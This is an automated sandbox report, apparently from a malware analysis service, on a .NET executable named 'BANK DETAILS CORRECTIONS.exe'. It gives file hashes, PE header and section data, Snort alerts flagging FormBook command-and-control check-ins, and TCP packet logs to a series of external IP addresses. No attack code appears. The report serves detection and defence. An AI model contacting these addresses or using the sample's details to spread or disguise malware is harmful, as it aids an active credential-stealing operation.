                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.985990383740242
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:BANK DETAILS CORRECTIONS.exe
                                                                                  File size:691'712 bytes
                                                                                  MD5:6b3d6565f98f00436cf229258a5ac2c8
                                                                                  SHA1:6fd6b3e765c4e2d6c262e48f3da8040f2f72e41c
                                                                                  SHA256:d48e76a16a20d4af37091f9dea89ce3fa2341e273a3898ac1b8b398c2a5793d5
                                                                                  SHA512:fec6fc3b596fc7132a9652c7f7b3376a8cec296661b147d6e12e038ba74ef999dabcd539002a1203608527d0cf43344fea4fd90c3083c5522ea31e6a1e60fc73
                                                                                  SSDEEP:12288:EsJTENl3j9cLW29yuRN0wC3RHyGCRcB66IvtBlai0y8Ui31zO:txENlT2620eC4NRvvBlalqiFzO
                                                                                  TLSH:58E42310E6CE8AA0D7BC7FF148A086B8037176256474DB3B6A48E5CDAB757EC475202F
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T...............0.............n.... ........@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:90cececece8e8eb0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4aa36e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x9354E9B9 [Wed Apr 29 23:26:49 2048 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xaa31b0x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000x5b4.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xa94cc0x70.text
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xa83740xa840063337886eae68a78e3af583e05ffbb64False0.9855866340081724data7.989685826785IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xac0000x5b40x6007ffcc5396b09c0c60d26fd901607bf86False0.423828125data4.11844720397453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xae0000xc0x200c93b3f8847a46ae974e8b907940fd78aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_VERSION0xac0900x324data0.43159203980099503
                                                                                  RT_MANIFEST0xac3c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                  Imports

                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  03/18/24-14:49:23.116360TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976480192.168.2.1089.31.143.90
                                                                                  03/18/24-14:47:24.864581TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973480192.168.2.1049.0.230.183
                                                                                  03/18/24-14:47:45.037863TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974080192.168.2.1066.29.152.141
                                                                                  03/18/24-14:49:15.008940TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976180192.168.2.1089.31.143.90
                                                                                  03/18/24-14:49:00.929117TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975780192.168.2.10103.197.25.241
                                                                                  03/18/24-14:47:36.204871TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.1066.29.152.141
                                                                                  03/18/24-14:46:47.390741TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972480192.168.2.10144.76.75.181
                                                                                  03/18/24-14:48:41.640265TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.1050.6.160.34
                                                                                  03/18/24-14:46:38.541470TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.10144.76.75.181
                                                                                  03/18/24-14:48:07.754865TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.1087.236.19.107
                                                                                  03/18/24-14:48:22.873091TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.10154.7.21.55
                                                                                  03/18/24-14:47:15.585177TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973280192.168.2.10104.21.63.135
                                                                                  03/18/24-14:46:41.234545TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972280192.168.2.10144.76.75.181
                                                                                  03/18/24-14:47:30.526801TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973680192.168.2.1049.0.230.183
                                                                                  03/18/24-14:48:36.357367TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.1050.6.160.34
                                                                                  03/18/24-14:47:22.032780TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.1049.0.230.183
                                                                                  03/18/24-14:47:53.290655TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.10192.64.119.184
                                                                                  03/18/24-14:46:06.415073TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971580192.168.2.10149.88.64.51
                                                                                  03/18/24-14:46:26.987706TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.1047.76.88.64
                                                                                  03/18/24-14:48:28.230214TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.10154.7.21.55
                                                                                  03/18/24-14:49:17.708078TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976280192.168.2.1089.31.143.90
                                                                                  03/18/24-14:47:39.612848TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.1066.29.152.141
                                                                                  03/18/24-14:48:14.519924TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.1087.236.19.107
                                                                                  03/18/24-14:48:05.006691TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.1087.236.19.107
                                                                                  03/18/24-14:47:59.248907TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974480192.168.2.10192.64.119.184
                                                                                  03/18/24-14:48:20.193872TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974980192.168.2.10154.7.21.55
                                                                                  03/18/24-14:46:52.992602TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972580192.168.2.1064.190.62.22
                                                                                  03/18/24-14:46:32.650841TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971980192.168.2.1047.76.88.64
                                                                                  03/18/24-14:47:02.369576TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972880192.168.2.1064.190.62.22
                                                                                  03/18/24-14:46:23.153101TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971680192.168.2.1047.76.88.64
                                                                                  03/18/24-14:49:03.754472TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.10103.197.25.241
                                                                                  03/18/24-14:46:55.688066TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972680192.168.2.1064.190.62.22
                                                                                  03/18/24-14:47:07.758224TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972980192.168.2.10104.21.63.135
                                                                                  03/18/24-14:49:09.406211TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24976080192.168.2.10103.197.25.241
                                                                                  03/18/24-14:47:50.648512TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.10192.64.119.184
                                                                                  03/18/24-14:48:33.723190TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975380192.168.2.1050.6.160.34
                                                                                  03/18/24-14:47:10.366529TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973080192.168.2.10104.21.63.135

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 18, 2024 14:46:06.106287956 CET4971580192.168.2.10149.88.64.51
                                                                                  Mar 18, 2024 14:46:06.413294077 CET8049715149.88.64.51192.168.2.10
                                                                                  Mar 18, 2024 14:46:06.413419008 CET4971580192.168.2.10149.88.64.51
                                                                                  Mar 18, 2024 14:46:06.415072918 CET4971580192.168.2.10149.88.64.51
                                                                                  Mar 18, 2024 14:46:06.721010923 CET8049715149.88.64.51192.168.2.10
                                                                                  Mar 18, 2024 14:46:06.822541952 CET8049715149.88.64.51192.168.2.10
                                                                                  Mar 18, 2024 14:46:06.822760105 CET4971580192.168.2.10149.88.64.51
                                                                                  Mar 18, 2024 14:46:06.833880901 CET4971580192.168.2.10149.88.64.51
                                                                                  Mar 18, 2024 14:46:07.108602047 CET8049715149.88.64.51192.168.2.10
                                                                                  Mar 18, 2024 14:46:07.140691996 CET8049715149.88.64.51192.168.2.10
                                                                                  Mar 18, 2024 14:46:22.847068071 CET4971680192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:23.152542114 CET804971647.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:23.152779102 CET4971680192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:23.153100967 CET4971680192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:23.458679914 CET804971647.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:23.458705902 CET804971647.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:23.458815098 CET4971680192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:24.668363094 CET4971680192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:26.682559967 CET4971780192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:26.987293005 CET804971747.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:26.987426043 CET4971780192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:26.987705946 CET4971780192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:27.292505026 CET804971747.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:27.292532921 CET804971747.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:27.292587996 CET4971780192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:28.496510983 CET4971780192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:29.512662888 CET4971880192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:29.813494921 CET804971847.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:29.813596964 CET4971880192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:29.813901901 CET4971880192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:30.114360094 CET804971847.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:30.114381075 CET804971847.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:30.114397049 CET804971847.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:30.114483118 CET4971880192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:31.324812889 CET4971880192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:32.340807915 CET4971980192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:32.650441885 CET804971947.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:32.650590897 CET4971980192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:32.650840998 CET4971980192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:32.960166931 CET804971947.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:32.960242033 CET804971947.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:32.960386992 CET4971980192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:32.960583925 CET4971980192.168.2.1047.76.88.64
                                                                                  Mar 18, 2024 14:46:33.270064116 CET804971947.76.88.64192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.366398096 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.541013956 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.541178942 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.541470051 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.715842009 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716084957 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716103077 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716151953 CET8049721144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:38.716192007 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:38.716227055 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:40.043420076 CET4972180192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.059415102 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.234124899 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.234221935 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.234544992 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.409164906 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409279108 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409295082 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409377098 CET8049722144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:41.409421921 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:41.409421921 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:42.902200937 CET4972280192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.511080980 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.685820103 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.686052084 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.686347008 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.860836029 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860862017 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860944986 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.860970020 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.861032963 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:44.861043930 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.861108065 CET4972380192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:44.861123085 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:45.035608053 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:45.035626888 CET8049723144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.215873957 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.390405893 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.390496016 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.390741110 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.565274000 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565624952 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565648079 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565661907 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:47.565768957 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.565931082 CET4972480192.168.2.10144.76.75.181
                                                                                  Mar 18, 2024 14:46:47.740379095 CET8049724144.76.75.181192.168.2.10
                                                                                  Mar 18, 2024 14:46:52.816927910 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:52.992162943 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:52.992330074 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:52.992602110 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:53.167927027 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:53.167957067 CET804972564.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:53.168253899 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:54.496640921 CET4972580192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.512938023 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.687660933 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.687812090 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.688066006 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:55.863796949 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.863828897 CET804972664.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:55.863878012 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:57.199665070 CET4972680192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.215837955 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.391607046 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.391702890 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.392365932 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:58.567924023 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.567974091 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568355083 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568489075 CET804972764.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:46:58.568567038 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:46:59.902806044 CET4972780192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:00.919106960 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:01.093946934 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:01.094109058 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.369575977 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.545206070 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:02.545244932 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:02.545388937 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.546802044 CET4972880192.168.2.1064.190.62.22
                                                                                  Mar 18, 2024 14:47:02.721425056 CET804972864.190.62.22192.168.2.10
                                                                                  Mar 18, 2024 14:47:07.669711113 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.757265091 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:07.757472992 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.758224010 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:07.845474958 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005417109 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005518913 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.005764961 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.007513046 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007729053 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007860899 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.007893085 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.007936954 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008006096 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008039951 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008121014 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008157015 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008188009 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008193016 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008208990 CET8049729104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:08.008251905 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:08.008318901 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:09.262387991 CET4972980192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.278243065 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.366116047 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.366276979 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.366528988 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.454380989 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623780966 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623802900 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623815060 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623830080 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623891115 CET4973080192.168.2.10104.21.63.135
                                                                                  Mar 18, 2024 14:47:10.623894930 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623908043 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623920918 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623935938 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623950958 CET8049730104.21.63.135192.168.2.10
                                                                                  Mar 18, 2024 14:47:10.623963118 CET8049730104.21.63.135192.168.2.10
